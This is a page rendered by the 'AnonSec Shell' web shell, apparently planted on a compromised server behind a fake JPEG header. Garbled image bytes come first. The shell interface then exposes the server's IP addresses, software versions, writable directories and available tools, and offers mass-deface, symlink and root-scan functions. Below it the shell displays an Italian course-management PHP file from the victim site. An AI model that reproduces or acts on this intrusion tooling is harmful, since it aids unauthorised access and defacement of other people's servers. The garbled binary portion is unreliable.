JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 52.223.31.75  /  Your IP : 172.31.44.28   [ Reverse IP ]
Web Server : Apache/2.4.67 () OpenSSL/1.0.2k-fips PHP/7.4.33
System : Linux ip-172-31-14-184.eu-central-1.compute.internal 4.14.281-212.502.amzn2.x86_64 #1 SMP Thu May 26 09:52:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
Domains : 4 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/ascii/app/components/pratica/helper/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/ascii/app/components/pratica/helper/content.php
<?php
class ContentPratica extends Content
{
  
  /**
   *@author Angelo Pescatore
   *@author Giuseppe Paglialonga
   * 
   * 
   * 
   * 
   */
  public function getPratica($id)
  {
    
    $aid   = $this->QuoteInt($id);
    $query = "SELECT * FROM Pratica where id = $aid";
    return $this->SafeFetch($query);
    
  }
   public function getTotalePratiche()
  {
    
    $query = "SELECT SUM(totalecostopratica) FROM pratica WHERE stato=5";
    return $this->SafeFetchOne($query);
    
  }
    public function getPraticheSoloId()
  {
    
      $query = "SELECT pratica.idpratica as id, CONCAT(cliente.ragioneSociale, ' - ', corso.titolo, ' - ', pratica.datainizio) as label FROM pratica JOIN partecipazione using (`idpratica`) JOIN cliente using (`idcliente`) join afferenza using (`idpratica`) join corso using (`idcorso`)";

      return $this->SafeFetch($query);
    
  }

  public function getPraticheCliente($idcliente)
  {
      $aidcliente   = $this->QuoteInt($idcliente);
      $query = "SELECT *, pratica.idpratica as id, CONCAT(cliente.ragioneSociale, ' - ', corso.titolo, ' - ', pratica.datainizio) as label, pratica.note as notepratica, stato.nomestato FROM pratica JOIN partecipazione using (`idpratica`) JOIN cliente using (`idcliente`) join afferenza using (`idpratica`) join corso using (`idcorso`) join stato on stato.idstato=pratica.stato where idcliente = $aidcliente";

      return $this->SafeFetch($query);
    
  }

  
  


  public function getTotalePraticheOggi()
  {
    $query = "SELECT SUM(totalecostopratica) FROM pratica
WHERE (DATE(insert_time) BETWEEN (NOW()- INTERVAL 1 day) AND NOW()) && stato=5
";
    return $this->SafeFetchOne($query);
    
  }
  

  public function contaPraticheOggi()
  {
    $query = "SELECT count(*) FROM pratica
WHERE (DATE(insert_time) BETWEEN (NOW()- INTERVAL 1 day) AND NOW()) && stato=5
";
    return $this->SafeFetchOne($query);
    
  }
  public function contaPratiche()
  {
    $query = "SELECT count(*) FROM pratica where stato=5
";
    return $this->SafeFetchOne($query);
    
  }

  public function getTotalePraticheMese()
  {
    
    $query = "SELECT SUM(totalecostopratica) FROM pratica
WHERE (DATE(insert_time) BETWEEN (NOW()- INTERVAL 1 MONTH) AND NOW()) && stato=5
";
    return $this->SafeExec($query);
    
  }
  public function getPratiche($ameseopz, $agiornopz)
  {
    //la query include la pratica con il corso di riferimento e il cliente coninvolto con tutti i dati
   $meseopz=$this->QuoteInt($ameseopz);
   $giornopz=$this->QuoteInt($agiornopz);
    if($meseopz >0|| $giornopz>0)
    {
      if($meseopz>0){
        $query="SELECT count(*) as conta FROM pratica WHERE (DATE(insert_time) BETWEEN (NOW()- INTERVAL $meseopz MONTH) AND NOW())";
      }else if($giornopz>0){
        $anno = $this->QuoteText(date("Y")."-01-01 00:00:00");
        $query="SELECT count(*) as conta FROM pratica WHERE (DATE(insert_time) BETWEEN $anno AND ($anno + INTERVAL $giornopz YEAR))";
      }
      
      return $this->SafeFetch($query)[0]['conta'];

    }
    else{
      
          $query = "select idpratica, idedizione, inseritoedizone, idpartecipazione, pagamentoricevuto, idafferenza,idcliente,idcorso,datainizio, datafine, idstato, pratica.note, inseritopiattaforma, id_user, pratica.last_time_update, pratica.insert_time, totalecostopratica, titolo, prezzo, corso.descrizione,nomestato, finalita, programma,destinatari, allegati, contenuti,caratteristiche, tempocertificati, durata,ragionesociale, indirizzo, citta, piva, codicefiscale, telefono, email, pratica.sede from afferenza  join  pratica using (`idpratica`) join corso using (`idcorso`) join partecipazione using (`idpratica`) join cliente using (idcliente) JOIN stato on pratica.stato=stato.idstato order by pratica.last_time_update";
  }
    return $this->SafeFetch($query);
    
  }

  public function getPraticheHome()
  {
  
      
          $query = "select idpratica, idedizione, inseritoedizone, idpartecipazione, idafferenza,idcliente,idcorso,datainizio, datafine, idstato, pratica.note, inseritopiattaforma, id_user, pratica.last_time_update, pratica.insert_time, totalecostopratica, titolo, prezzo, corso.descrizione,nomestato, finalita, programma,destinatari, allegati, contenuti,caratteristiche, tempocertificati, durata,ragionesociale, indirizzo, citta, piva, codicefiscale, telefono, email, pratica.sede from afferenza  join  pratica using (`idpratica`) join corso using (`idcorso`) join partecipazione using (`idpratica`) join cliente using (idcliente) JOIN stato on pratica.stato=stato.idstato order by pratica.last_time_update DESC limit 15";
    return $this->SafeFetch($query);
    
  }

  public function getDatiPraticheHome(){
      $query = "SELECT  DATE(insert_time) giorno, COUNT(DISTINCT idpratica) totale "
                ."FROM    pratica "
                ."WHERE (DATE(insert_time) BETWEEN (NOW()- INTERVAL 1 MONTH) AND NOW()) "
                ."GROUP   BY  DATE(insert_time) ";
      return $this->SafeFetch($query);
  }


  public function getPraticheOggi()
  {
    //la query include la pratica con il corso di riferimento e il cliente coninvolto con tutti i dati
    $query = "select * from pratica where  DATE(`insert_time`) = DATE(CURDATE())";
    return $this->SafeFetch($query);
    
  }
  public function deletePratica($id)
  {
    
    $aid   = $this->QuoteInt($id);
    $query = "DELETE FROM pratica where idpratica = $aid";
    $this->SafeExec($query);
    $query = "DELETE FROM edizione_cliente where idpratica = $aid";
    return $this->SafeExec($query);
    
  }
  public function insertPratica($datainizio, $datafine, $note, $stato, $inseritopiattaforma, $iduser, $totalecostopratica, $idcorso, $idcliente, $sede, $idedizione, $nome_referente, $sede_tirocinio, $inseritoedizone, $pagamentoricevuto)
  {
    $aidcorso             = $this->quoteInt($idcorso);
    $aidcliente           = $this->quoteInt($idcliente);
    $sw                   = true;
    $adatainizio          = $this->quoteText($datainizio);
    $adatafine            = $this->quoteText($datafine);
    $anote                = $this->quoteText($note);
    $astato               = $this->quoteInt($stato);
    $asede                = $this->quoteText($sede);
    $ainseritopiattaforma = $this->quoteInt($inseritopiattaforma);
    $aiduser              = $this->quoteInt($iduser);
    $atotalecostopratica  = $this->quoteText($totalecostopratica);
    
    $apagamentoricevuto = $this->quoteText($pagamentoricevuto);

    if($inseritoedizone && $idedizione){
          $idedizione= $this->quoteInt($idedizione);
          $nome_referente= $this->quoteText($nome_referente);
          $sede_tirocinio= $this->quoteText($sede_tirocinio);
          $query= "INSERT INTO pratica   (datainizio,datafine,note,stato,inseritopiattaforma, id_user, totalecostopratica, last_time_update, sede, idedizione, inseritoedizone, pagamentoricevuto) VALUES($adatainizio,$adatafine,$anote,$astato,$ainseritopiattaforma, $aiduser, $atotalecostopratica, NOW(), $asede, $idedizione, 1, $apagamentoricevuto)";
          $id = $this->SafeInsert($query);
         
          $this->SafeInsert("INSERT INTO edizione_cliente   (idcliente,idedizione,nome_referente,sede_stage,idpratica) VALUES($aidcliente,$idedizione,$nome_referente,$sede_tirocinio, $id)");

    }else{
      $query= "INSERT INTO pratica   (datainizio,datafine,note,stato,inseritopiattaforma, id_user, totalecostopratica, last_time_update, sede, inseritoedizone, pagamentoricevuto) VALUES($adatainizio,$adatafine,$anote,$astato,$ainseritopiattaforma, $aiduser, $atotalecostopratica, NOW(), $asede, 0, $apagamentoricevuto)";
      
      $id = $this->SafeInsert($query);
    }


    $this->SafeInsert("INSERT INTO partecipazione   (idcliente, idpratica) VALUES($aidcliente,$id)");
    $this->SafeInsert("INSERT INTO afferenza   (idcorso, idpratica) VALUES($aidcorso,$id)");
    
    return $id;
  }
  
  
  
  
  public function updatePratica($idpratica, $datainizio, $datafine, $note, $stato, $inseritopiattaforma, $iduser, $totalecostopratica, $idcorso, $idcliente, $sede, $idpartecipazione, $idafferenza, $idedizione, $nome_referente, $sede_tirocinio, $inseritoedizone, $pagamentoricevuto)
  {
    $sw                   = false;
    $aidpartecipazione    = $this->quoteInt($idpartecipazione);
    $aidafferenza         = $this->quoteInt($idafferenza);
    $aidcorso             = $this->quoteInt($idcorso);
    $aidcliente           = $this->quoteInt($idcliente);
    $aidpratica           = $this->quoteInt($idpratica);
    $adatainizio          = $this->quoteText($datainizio);
    $adatafine            = $this->quoteText($datafine);
    $anote                = $this->quoteText($note);
    $astato               = $this->quoteInt($stato);
    $asede                = $this->quoteText($sede);
    $ainseritopiattaforma = $this->quoteInt($inseritopiattaforma);
    $aiduser              = $this->quoteInt($iduser);
    $atotalecostopratica  = $this->quoteText($totalecostopratica);

    $apagamentoricevuto = $this->quoteText($pagamentoricevuto);
     
    if($inseritoedizone!="false" && $inseritoedizone !=false ){
          $idedizione= $this->quoteInt($idedizione);
          $nome_referente= $this->quoteText($nome_referente);
          $sede_tirocinio= $this->quoteText($sede_tirocinio);
          $query = "UPDATE pratica SET pagamentoricevuto=$apagamentoricevuto, datainizio= $adatainizio,  datafine= $adatafine,note= $anote,stato= $astato,inseritopiattaforma= $ainseritopiattaforma, id_user=$aiduser, idedizione=$idedizione, totalecostopratica=$atotalecostopratica, last_time_update=NOW(), sede=$asede, inseritoedizone=1 WHERE idpratica=$aidpratica";
          
          $this->SafeExec($query);

          $query = "DELETE FROM edizione_cliente where idpratica = $aidpratica";
          $this->SafeExec($query);

          $this->SafeInsert("INSERT INTO edizione_cliente   (idcliente,idedizione,nome_referente,sede_stage,idpratica) VALUES($aidcliente,$idedizione,$nome_referente,$sede_tirocinio, $aidpratica)");
    }else{
          $query = "UPDATE pratica SET pagamentoricevuto=$apagamentoricevuto, datainizio= $adatainizio,  datafine= $adatafine,note= $anote,stato= $astato,inseritopiattaforma= $ainseritopiattaforma, id_user=$aiduser, totalecostopratica=$atotalecostopratica, last_time_update=NOW(), sede=$asede, inseritoedizone=0, idedizione=0 WHERE idpratica=$aidpratica";
        
          $this->SafeExec($query);

          $query = "DELETE FROM edizione_cliente where idpratica = $aidpratica";
          $this->SafeExec($query);
    }



    $query1 = "UPDATE partecipazione SET   idcliente=$aidcliente, idpratica=$aidpratica where 
    idpartecipazione=$aidpartecipazione";
    $this->SafeExec($query1);
    $query2 = "UPDATE afferenza SET  idcorso=$aidcorso, idpratica=$aidpratica where idafferenza=$aidafferenza";
    $this->SafeExec($query2);
    $asd = "INSERT INTO pratica_meta (id_user, idpratica) VALUES($aiduser,$aidpratica)";
    $this->SafeInsert($asd);
    
    return $idpratica;
  }
  
}

?>

Anon7 - 2022
AnonSec Team